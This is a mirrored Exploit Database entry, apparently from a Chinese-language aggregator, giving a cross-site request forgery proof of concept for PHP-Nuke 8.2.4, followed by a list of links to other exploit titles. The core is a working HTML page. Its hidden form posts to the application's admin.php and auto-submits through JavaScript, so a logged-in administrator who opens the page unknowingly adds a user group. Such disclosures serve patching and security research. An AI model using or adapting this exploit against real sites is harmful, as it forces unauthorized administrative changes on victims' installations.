PHP-Nuke 8.2.4 – Cross-Site Request Forgery

Exploit Database
12 阅读

作者： sajith

日期： 2012-12-11
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/23289/

###########################################################
[~] Exploit Title:CSRF vulnerability
[~] Author: sajith
[~] version: PHP Nuke 8.2.4
[~] vulnerable app link:http://phpnuke.org/modules.php?name=Release
###########################################################
 [CSRF add group]

<html lang="en">
<head>
<title>CSRF POC( PHP nuke 8.2.4)</title>
</head>
<body>
<form action="http://127.0.0.1/phpnuke-release-8.2.4/phpnuke/html/admin.php"
id="formid" method="post">
<input type="hidden" name="name" value="testing" />
<input type="hidden" name="description"
value="testing+for+CSRF%3Cbr+%2F%3E" />
<input type="hidden" name="points" value="0" />
<input type="hidden" name="op" value="grp_add" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>

last Exploits
PHP-Nuke 8.2.4 – Cross-Site Request Forgery的更多信息

Victor CMS 1.0 – ‘user_firstname’ Persistent Cross-Site Scripting：
Flatpress Add Blog 1.0.3 – Persistent Cross-Site Scripting：
Joomla! Component com_shop – ‘id’ SQL Injection：
VMware vCenter Server 7.0 – Remote Code Execution (RCE) (Unauthenticated)：
Beehive Forum 1.4.4 – Persistent Cross-Site Scripting：
TP-Link TL-WR740N – Cross-Site Scripting：
Openscrutin 1.03 – Local File Inclusion / Remote File Inclusion：
Chyrp 2.1.1 – ‘ajax.php’ HTML Injection：